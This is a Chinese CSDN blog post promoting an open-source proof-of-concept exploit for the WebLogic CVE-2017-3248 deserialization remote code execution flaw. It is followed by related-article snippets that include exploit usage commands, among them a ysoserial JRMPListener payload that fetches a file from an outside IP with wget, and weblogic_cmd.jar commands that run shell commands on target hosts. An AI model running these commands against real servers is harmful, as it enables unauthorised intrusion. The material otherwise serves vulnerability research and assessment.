推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具

最新推荐文章于 2024-07-16 16:26:41 发布
最新推荐文章于 2024-07-16 16:26:41 发布
阅读量431 收藏 4
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00075/article/details/139694763
版权

推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具

项目介绍

在网络安全研究的浩瀚星空中,一款名为exploit-CVE-2017-3248-bobsecq.py的脚本如星辰般璀璨。它专为针对“Oracle WebLogic RMI Registry UnicastRef对象Java反序列化远程代码执行”漏洞而设计——一个由Tenable发现但未公开具体攻击示例的安全隐患(CVE-2017-3248)。这款开源工具填补了这一空白,成为了首个实现该漏洞利用的脚本/概念验证(POC)。

项目技术分析

针对Oracle WebLogic服务器中这一致命缺陷,exploit-CVE-2017-3248-bobsecq.py巧妙地利用了Java反序列化的特性,通过RMI(Remote Method Invocation)服务中的UnicastRef对象进行攻击。它依赖于著名的 ysoserial 工具来生成恶意序列化数据,进而实现在目标WebLogic服务器上的远程代码执行。这样的技术栈不仅展示了开发者对于复杂安全环境的理解,也对研究人员和安全工程师来说是极具价值的研究材料。

项目及技术应用场景

这款脚本的应用范围广泛,主要面向两大场景:

  1. 漏洞检测与评估:IT安全团队可以使用此工具快速评估网络中部署的WebLogic服务器是否易受攻击,从而采取相应加固措施。
  2. 安全研究与教育:对于安全研究人员和学习网络安全的学生而言,这个脚本提供了一个实际操作平台,帮助他们理解并防范Java反序列化攻击,提升防御技能。

特别适用于版本号为10.3.6.0、12.1.3.0、12.2.1.0以及12.2.1.1的Oracle WebLogic Server,经过测试,即使是在12.1.2.0版本上也能有效工作(支持SSL连接),显示了其广泛的兼容性。

项目特点

  • 先驱性:作为首个公开发布的针对CVE-2017-3248的利用工具,体现了研发者的敏锐和技术领先。
  • 高度自定义:支持通过命令行参数灵活配置攻击细节,如攻击者IP、端口、目标指令等,便于定制化测试。
  • 易于集成:依赖ysoserial,简化了开发流程,同时也提升了攻击载荷的多样性。
  • 安全性研究与教育的宝贵资源:通过模拟攻击,帮助安全人员加深对高级安全威胁的理解和防御策略的建立。
  • 跨平台:基于Python编写,确保了良好的运行兼容性,无论在哪种操作系统环境下都能轻松部署。

综上所述,exploit-CVE-2017-3248-bobsecq.py不仅是网络安全专业人士的得力助手,也是教育领域不可或缺的教学工具。通过它,我们可以更深入地理解和应对Java反序列化相关的安全风险,强化我们的系统防护网。对于那些热衷于网络安全研究或维护企业安全的专业人士而言,该项目无疑是一块宝贵的敲门砖。

褚知茉Jade
关注
XWiki DatabaseSearch 远程代码执行漏洞复现(CVE-2024-31982)
0xSec
06-20 605
XWiki 14.10.20 之前版本存在远程代码执行漏洞,改漏洞源于DatabaseSearch 接口代码设置不当缺陷,导致未经身份验证的远程攻击者可以执行任意Groovy代码或任意系统指令,从而获取服务器权限。该漏洞利用难度较低,建议受影响用户尽快升级至安全版本。
Weblogic漏洞Java反序列化CVE-2015-4852解析
simonnews的博客
05-04 5240
weblogic系列_Java反序列化_CVE-2015-4852 1:概述1.1:官方概述1.2:漏洞概述2:漏洞原理分析2.1:基本概念2.1欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file
CVE-2017-3248&CVE-2018-2628
一个安全研究员
05-27 2657
如题
web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧
最新发布
程序员六七的博客
07-16 575
安全客 - 安全资讯平台
WebLogic_CVE-2017-3248&&GetShell-CMD验证工具.rar
02-11
Weblogic任意命令执行的检测工具WebLogic_CVE-2017-3248文件夹的执行命令: java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令: java -jar Weblogic-Unserialization-GetShll-CMD.jar 或者双击starter.bat.
CVE-2017-3248——WebLogic反序列化漏洞利用工具
weixin_30628801的博客
07-20 878
著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,安全风险高,Oracle官方及时发布了最新补丁,修复了该漏洞,阿里云安全团队建议用户尽快自查并升级。 具体详情如下: 漏洞编号: CVE-2017-3248 漏洞名称: WebLogic 反序列化漏洞 官方评级: 高危 漏洞描述: Or...
weblogicT3反序列化之CVE-2017-3248&CVE-2018-2628&CVE-2018-3245
weixin_45682070的博客
03-13 5825
前言 上上篇文章我们分析了CVE-2015-4852、CVE-2016-0638、CVE-2016-3510的漏洞,因果是从resolveClass方法中出现的,resolveClass方法直接继承了父类的方法,然后没有任何过滤的造成了序列化漏洞,后面两个cve都是前者的绕过。今天分析一下CVE-2017-3248 & CVE-2018-2628,上上文中我们知道readClassDesc类描述方法可分为没有代理的类和代理类,CVE-2017-3248漏洞的成因就是代理类resolveProxyCl
weblogicCVE-2017-3248CVE-2018-2628,CVE-2018-2893,CVE-2018-3245反序列绕过分析
weixin_30820151的博客
01-11 810
说一下复现CVE-2017-3248可以参考p牛的环境,p牛的环境CVE-2018-2628实际就是CVE-2017-3248,他漏洞编号这块写错了。 攻击流程就如下图,攻击者开启JRMPListener监听在1099端口,等待受害者链接,当受害者链接时,把gadgets返回给客户端: CVE-2017-3248以后的漏洞都是利用了JRMP java远程方法协议,利用java.rmi...
JNDIExploit.v1.4 Weblogic-CVE-2023-21839
03-10
4. **权限升级**:一旦远程代码执行成功,攻击者可能会尝试提升权限,进一步控制服务器或获取敏感信息。 为了防范此类攻击,我们需要采取以下措施: - **更新补丁**:及时安装Oracle官方发布的安全补丁,修复CVE-...
CVE-2018-2883漏洞利用程序msf
03-27
CVE-2018-2883是一个针对Oracle WebLogic Server的安全漏洞,该漏洞属于远程代码执行(RCE)类型,允许攻击者通过发送恶意构造的数据包来执行任意代码。此漏洞影响了多个版本的WebLogic Server,包括10.3.6.0、12.1....
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248CVE-2018-2628
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2752
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
CVE-2017-3248简单复现
ddr12231的博客
09-17 884
我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt" linux虚拟机上执行 python exploit-C...
weblogic系列漏洞整理————6、反序列化漏洞(CVE-2017-3248
Fly_鹏程万里
11-01 3224
0x01 漏洞描述 2017年1月27日,WebLogic 官方发布了一个编号为 CVEID: CVE-2017-3248 的漏洞,影响为 Critical 。之前轰动一时的反序列化漏洞,官方当时的修补措施,在本漏洞中可被绕过。此次漏洞影响 WebLogic 版本如下图所示: 0x02 漏洞分析与验证 分析之前 WebLogic 漏洞 CVE-2015-4852 的补丁,发现 WebLo...
Weblogic安全漫谈(二)
moresec的博客
01-03 1305
分析开启T3反序列化魔盒后的修复与绕过。
WebLogic反序列化漏洞(CVE-2017-3248
公众号shadow sock7
11-19 7379
参考: https://paper.seebug.org/333/ 环境安装 反弹shell参考: https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.html weblogic在服务器命令行安装步骤参考: https://blog.csdn.net/caiqiiqi/article/details/...
WebLogic服务器多起漏洞利用CVE-攻击与修复策略
本文档主要关注WebLogic服务器上的几个关键漏洞,包括CVE-2017-10271、CVE-2018-2628和CVE-2020-14882。这些漏洞影响了WebLogic的不同版本,具体涉及10.3.6.0.0、12.1.3.0.0、12.2.1.4.0、14.1.1.0.0等,表明它们对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

褚知茉Jade

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值